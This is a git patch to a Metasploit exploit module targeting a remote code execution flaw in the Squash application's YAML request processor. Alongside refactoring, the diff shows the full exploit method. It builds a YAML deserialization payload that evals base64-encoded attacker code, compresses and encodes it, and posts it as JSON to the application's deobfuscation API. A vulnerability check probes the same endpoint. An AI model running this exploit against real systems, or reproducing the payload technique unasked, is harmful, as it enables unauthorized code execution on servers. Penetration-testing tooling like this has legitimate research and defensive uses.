From 1c6e994fe85f0c5065e2c7e82029233f1ab9b29d Mon Sep 17 00:00:00 2001
From: Charlie Eriksen <charlie.eriksen@gmail.com>
Date: Thu, 8 Aug 2013 14:29:35 -0400
Subject: [PATCH] Adding improvements based on Juan's feedback

---
 .../exploits/unix/webapp/squash_yaml_exec.rb  | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb
index ff1e0255ed..becd53c36a 100644
--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -7,7 +7,6 @@
 
 require 'msf/core'
 require 'zlib'
-require 'base64'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@@ -16,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Squash YAML Code Exec',
+			'Name'           => 'Squash YAML Code Execution',
 			'Description'    => %q{
 					This module exploits a remote code execution vulnerability in the
 				YAML request processor of the Squash application.
@@ -49,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		response = send_request_cgi({
-				'uri'     => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+				'uri'     => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
 				'method'  => 'POST',
 				'ctype'   => 'application/json',
-			}, 30)
+			})
+		
 		if response.code == 422
 			print_status("Got HTTP 422 result, target may be vulnerable")
 			return Exploit::CheckCode::Appears
@@ -63,15 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		code = Rex::Text.encode_base64(payload.encoded)
 		yaml =	"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
-			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
-			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
-		payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
+				"'#{rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
+				": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
+		payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
 		data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
+
 		send_request_cgi({
-			'uri'     => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+			'uri'     => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
 			'method'  => 'POST',
 			'ctype'   => 'application/json',
 			'data'    => data
-		}, 30)
+		})
 	end
 end